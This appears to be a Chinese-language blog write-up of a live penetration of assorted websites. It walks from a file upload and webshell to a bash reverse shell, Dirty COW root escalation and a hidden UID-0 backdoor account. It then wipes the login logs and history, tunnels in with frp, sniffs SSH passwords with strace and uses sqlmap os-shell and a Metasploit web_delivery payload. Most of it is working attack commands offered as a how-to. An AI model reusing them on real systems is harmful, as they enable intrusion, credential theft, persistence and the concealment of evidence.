红队实战攻击之随缘测站（上）

大家好，作为一个练习时长两年半的安全实习生，这几天大佬给了我一批网站让我练练手。跟着大佬的步骤慢慢学习，争取早日出道，呸呸，口误，早日成为大佬！

随缘搜集资产

大佬们都是0day、社工、钓鱼之类的，本人菜鸟一只，勿喷，看到一大堆资产，本着随缘的标准，开始了一系列的批量操作。

首先开始资产搜集，ip和域名信息都已经有了，这里我将所有的ip放到goby。(附上官网地址https://gobies.org/)

这是一个资产管理软件，能自动扫描端口以及识别指纹信息，漏洞扫描，密码爆破等等，还可以加载一些小插件，还是挺强的。为提高效率，这里只探测一些关键性端口。

同时将域名放到sql批量注入工具里面，加上一些简单的注入绕过，有条件的可以加上代理池。

探测完毕，因为给的目标站点不算少，其中肯定会触发到一些防护软件的拦截规则，刚好能帮我们过滤掉一部分难啃的站点，所以能检测到的相对来说会好利用一点（俗话说的好，柿子还是得挑软的来捏嘛）。

根据扫描出来的结果，将探测到的21，22，3389和数据库的端口分别整合一下，加载字典爆破一波。还看到有struts2框架，上struts2poc扫一波。做完以上的操作之后，都没有测出漏洞，不要气馁，这种情况很正常，要是漏洞这么容易找到，那就没什么成就感了。

下面就开始测web，点开web检测，可以查看已扫描到的全部资产，点链接符号即可跳到网站，一个一个进行测试。

再用fofa的浏览器插件，探测一下旁站资产。接下来的事，就是找后台，找注册登陆点，密码爆破，注入，框架漏洞等等。主站不行就去旁站再相同的操作做一遍。（现在网上有批量注入，批量找后台，批量爆破后台口令的一些脚本，但是每个网站的复杂程度都不一样，所以到这一步还是手工靠谱）。

经过漫长的重复操作，找到一个供应商注册登陆的，这种接口一般是要人工审核的，但是秉着不能放过任何一个小细节的心态，还是先注册试试，诶嘿，自动登录，有点意思～

进到后台，有两个上传点，都测一下，祭出burp大杀器！！！

改一下包，果不其然，没有限制，没有一点点防备，也没有一丝顾虑，你就这样出现～

把数据包返回的路径复制下来，冰蝎连接成功。

好了，外网拿shell基本上就这样了，只要有耐心，总能找得到，拿到shell的这一刻，一切的疲惫都随着多巴胺的传递烟消云散～

认认真真的维持据点

言归正传，先看一下权限，查看权限为www，权限有点小。

uname -a查看一下版本号，大于2.6.22，可以试试脏牛提权。

不知道是不是我冰蝎问题，输入命令老是卡死，先做个反弹吧。

Vps监听一下  ：nc -lvvp 8080

被控制的主机：bash -i >& /dev/tcp/vps的ip地址/8080 0>&1

反弹成功之后，在冰蝎里上传脏牛提权工具。

./dirty password

等了差不多3分钟，出现下图的内容之后即提权成功，拿着账号密码去登陆即可。

账号：firefart

密码：password

登陆之后不要急，先隐藏一下自己的操作，禁止history记录我的输入的命令。

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0

将备份的/tmp/passwd.bak，替换/etc/passwd。还原root账号。

看了下shadow里root账号的密码，没有解出来，那就创建一个root权限的账号吧。

useradd -p “密码” db -o -u 0 -g root

Cat /etc/passwd查看一下，新建成功。

用db账号登陆，whoami查看下权限。

对了，忘记看了w查看一下当前登陆用户，发现没有其他人在线。

last查看登陆记录，发现管理员这几天都有登陆过。

清理一波日志先。

echo ""> /var/log/wtmp  清空登陆日志

echo ""> /var/log/btmp  清空登陆失败日志

echo ""> ~/.bash_history 清除history日志

突然断开连接。

隐藏自己的登陆信息连ssh上去再看看，发现是管理员上线了，先战术性撤退。

ssh -T db@xx.xx.xx.xx /bin/bash -i

小心翼翼的横向拓展

账号没有被删，还好，做一下痕迹清理还是很有必要的。0v0俗话说的好，来都来了，不做点啥，那都对不起管理员对我们的信任，那就先接个代理吧。

正向代理试了一下，端口连接不上，看来是被防火墙给拦了，试试反向连接。用了ew，不是很稳定，数据传输大一点就会断，还是用frp吧，顺便用内置的stcp模块加密一下流量。

上传frp到控制机：

scp C:tools4.端口代理frpfrp_0.33.0_linux_amd64.tar.gz db@xx.xx.xx.xx:/tmp

vps上配置完服务端frps.ini后启用 nohup ./frps -c frps.ini &

控制端上配置客户端frpc.ini后，nohup ./frpc -c frpc.ini &

本机配置 ./frps -c frps.ini

接入goby，挂上代理，一键扫描内网网段，探测出来的漏洞不是很多，探测资产还是很强的！

顺便监听一下ssh，等管理员上线就能抓到他的密码。

strace -xx -fp `cat /var/run/sshd.pid` 2>&1| grep --line-buffered -P 'write(d, "\x00' | perl -lne '$|++; @F=/"s*([^"]+)s*"/g;for (@F){tr/\x//d}; print for @F'|grep --line-buffered -oP '.{8}K([2-7][0-9a-f])*$'|grep --line-buffered -v '^64$'|perl -pe 's/([0-9a-f]{2})/chr hex $1/gie'

资产探测的差不多了，漏洞扫描的还差了点，开了不少445端口，直接用msf扫一下ms17-010试试。如下图，这就是最初向往的黑阔感jio叭。

好吧，一个都没有，ms12-020和ms17-010也没打成功......以前看各位大佬的文章进内网rdp和smb漏洞就是一把梭，差点怀疑是我msf的问题，结果在他服务器上装了个msf还是一样的，放弃了，并没有那么简单，得换个思路。

翻一翻密码，thinkphp的框架，太多配置文件了，翻到吐，找到一个config，里面还是空的，不过看到了命名规则， grep -ri "DB_USER" 找到了数据库的账号。

查看这个路径，好的，获取到管理员明文账号密码（非root账号）。

连接成功。

能看到其他的数据库，权限很大，读一波密码，拿到了几个账号密码包括root密码，去解一下密，成功！

把获取到的账号密码加载进去去撞库试试，拿到了一台主机（另一个就是我已经拿到的主机），到goby里面看了下资产，是台windows 的主机，很幸福～

一键连接root，看到里面有域名和账号密码，是个oa系统，东西还挺多的。

然后网站挂了。。等到晚上终于可以连了，不过代理出问题了，整了半天，原来是自己的vpn出问题了，换了个节点之后，frp连接socks5成功。继续早上拿到的账号密码，mysql一键连接数据库。

python sqlmap.py -d mysql://root:#password@192.168.xx.xx:3306/mysql --os-shell

（此命令会自动udf提权）

执行这条命令需要先安装两个插件。

pip install PyMySQL

pip instal sqlalchemy

拿到os-shell之后，执行命令。喵喵喵？（心态炸裂）

然后多按了几次回车键，连接次数过多，ip被锁定了，好的，这条路断了- -

所以做渗透的心态得好...不说了，去楼梯口冷静冷静先。

再次查看一下ssh监听，管理员也一直没有上线，行叭行叭，管理员不管我，那我继续回到goby查看下内网的网站，挨个试试web端，许久之后...

功夫不负有心人，admin/123456进去了一个虚拟化系统，显示有21台计算机。赚了，弱口令大法好！

Msf生成反弹windows的powershell。

use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.xx.xx
set lport 5101
set srvport 5202
set uripath /
run

然后...没有弹回来，未完待续...

利用goby搜集资产信息，利用工具筛选出脆弱资产。拿到权限先隐藏踪迹，维持权限，再清理一些操作记录。想办法在主机搜集账号密码，资产等信息。linux可以尝试抓取ssh信息。然后再看看内网的资产，拿搜集到的账号密码去爆破，不然未授权漏洞，提权漏洞，exp，web漏洞等等。好了，不说了，我去买包辣条压压惊，等我打下来再出后续。